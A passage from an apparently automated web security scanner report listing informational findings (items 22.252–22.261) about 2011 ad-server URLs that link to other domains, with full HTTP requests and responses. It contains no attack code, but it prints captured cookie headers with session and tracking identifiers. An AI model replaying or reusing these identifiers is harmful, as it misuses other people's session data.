Set-Cookie: ROLL=v5Q2Y0M/d+zqGNHXUFc390yISxIi0bPhr7fCKadF7gTOdF6VqYmq8tecT61vdkvTdqiqdic8fskwW3tYTUArYRl+0nSSt+7FW6iaoRF!; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:07 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

22.252. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=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!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 334
Date: Sun, 30 Jan 2011 02:18:09 GMT
Connection: close
Set-Cookie: C2=hpMRNJpwIg02FqECdbdhKhwUwXoSI8Y4FqECYTehKhQ3gZoSIQTnGqECF2phKhAohXoSIYZ4FqECKGehKhwohXoSIca4FqECiGehKhQshXoSwOYAM/oRhI7YCwAoGj0r1RQcKasLGK2AI9YRoN53EkL3F+ygPXw6TV4UsumB/0mBhca7GIaWG4frMew41Z0Ckq1B6bjBLq6bDwWZGj6r4jQsMagJwaHCW8oBm0I9IsfzFeysNiQQoaoSCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:09 GMT; path=/
Set-Cookie: F1=BEmyE1kAAAAAdVyCAEAAOEA; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:09 GMT; path=/
Set-Cookie: ROLL=v5Q2Y0M/d+zqGNHXUFc390yISxIi0bPhr7fCKadF7gTOdF6VqYmq8tecT61vdkvTdqiqdic8fskwW3tYTUArYRl+0nSSt+7FW6iaoRF!; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:09 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?">here</a>
...[SNIP]...

22.253. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHP4&AP=1455 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2442
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8325832-T38269235-C83000000000035140
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:36 GMT
Content-Length: 2442


//<![CDATA[
function getRADIds() { return{"adid":"83000000000035140","pid":"8325832","targetid":"38269235"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 120);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_590875532() {var adCode_590875532=new Array();adCode_590875532.push('<iframe src="http://view.atdmt.com/CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="120">\n');adCode_590875532.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_590875532.push('document.write(\'<a href="http://clk.atdmt.com/CNT/go/299297287/direct;pc.106028736;wi.300;hi.120/01/" target="_blank"><img src="http://view.atdmt.com/CNT/view/299297287/direct;pc.106028736;wi.300;hi.120/01/"/></a>
...[SNIP]...

22.254. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVNC6&AP=1025 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2376
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8038176-T8335901-C107000000000040026
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:27:25 GMT
Content-Length: 2376


//<![CDATA[
function getRADIds() { return{"adid":"107000000000040026","pid":"8038176","targetid":"8335901"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 30);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2064842973() {var adCode_2064842973=new Array();adCode_2064842973.push('<iframe src="http://view.atdmt.com/BEL/iview/262582811/direct;/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="120" height="30">\n');adCode_2064842973.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_2064842973.push('document.write(\'<a href="http://clk.atdmt.com/BEL/go/262582811/direct;/01/" target="_blank"><img src="http://view.atdmt.com/BEL/view/262582811/direct;/01/"/></a>
...[SNIP]...

22.255. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QA&AP=1026 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 754
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031597-T8247108-C48000000000031630
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:12 GMT
Content-Length: 754


//<![CDATA[
function getRADIds() { return{"adid":"48000000000031630","pid":"8031597","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003L/48000000000031630.1??PID=8031597&amp;UIT=G&amp;TargetID=8247108&amp;AN=1360530400&amp;PG=INV4QA&amp;ASID=6c567eddf32344b0bd88cfa8851ae243" target="_blank"><img src="http://ads2.msads.net/CIS/29/000/000/000/004/822.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.256. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2761
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC06=FB=AgEAYQ4OwAwZ; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8195265-T37267164-C73000000000032314
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:52:35 GMT
Content-Length: 2761


//<![CDATA[
function getRADIds() { return{"adid":"73000000000032314","pid":"8195265","targetid":"37267164"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1530413745() {var adCode_1530413745=new Array();adCode_1530413745.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&amp;&amp;PID=8195265&amp;UIT=G&amp;TargetID=37267164&amp;AN=1530413745&amp;PG=NBCMSN&amp;ASID=c99db5ca4ed044deb124a62572ce3a84&destination=;ord=1530413745?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1530413745.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6036.149339.MICROSOFTONLINE/B5123903;abr=!ie;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/
...[SNIP]...

22.257. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2714
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC02=FB=AgEAYQ4UwAwC; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8195334-T37312983-C13000000000033752
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:54:53 GMT
Content-Length: 2714


//<![CDATA[
function getRADIds() { return{"adid":"13000000000033752","pid":"8195334","targetid":"37312983"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2247611() {var adCode_2247611=new Array();adCode_2247611.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&amp;&amp;PID=8195334&amp;UIT=G&amp;TargetID=37312983&amp;AN=2247611&amp;PG=NBCMSN&amp;ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_2247611.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6036.149339.MICROSOFTONLINE/B5123903.4;abr=!ie;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/G
...[SNIP]...

22.258. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QA&AP=1026 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; FC02=FB=AgEAYQ4UwAwC; FC00=FB=AgEAYQ6guQgB; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 752
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031597-T8247108-C54000000000030188
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:42 GMT
Content-Length: 752


//<![CDATA[
function getRADIds() { return{"adid":"54000000000030188","pid":"8031597","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003L/54000000000030188.1??PID=8031597&amp;UIT=G&amp;TargetID=8247108&amp;AN=35734390&amp;PG=INV4QA&amp;ASID=1534d2e1435d438fa8d65062c6a003f3" target="_blank"><img src="http://ads2.msads.net/CIS/20/000/000/000/010/965.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.259. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVHP1&AP=1089 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2802
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013958-T8395935-C18000000000034994
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:56:44 GMT
Content-Length: 2802


//<![CDATA[
function getRADIds() { return{"adid":"18000000000034994","pid":"8013958","targetid":"8395935"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1915357353() {var adCode_1915357353=new Array();adCode_1915357353.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&amp;&amp;PID=8013958&amp;UIT=G&amp;TargetID=8395935&amp;AN=1915357353&amp;PG=INVHP1&amp;ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1915357353.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.5;abr=!ie;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=htt
...[SNIP]...

22.260. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QA&AP=1026 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 752
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031597-T8247108-C12000000000036588
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:59:05 GMT
Content-Length: 752


//<![CDATA[
function getRADIds() { return{"adid":"12000000000036588","pid":"8031597","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003L/12000000000036588.1??PID=8031597&amp;UIT=G&amp;TargetID=8247108&amp;AN=37357682&amp;PG=INV4QA&amp;ASID=9e857e42eb3c48638ad88033a370e7b5" target="_blank"><img src="http://ads2.msads.net/CIS/76/000/000/000/011/752.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.261. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QB&AP=1026 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 751
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8085302-T8295071-C83000000000032738
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:13 GMT
Content-Length: 751


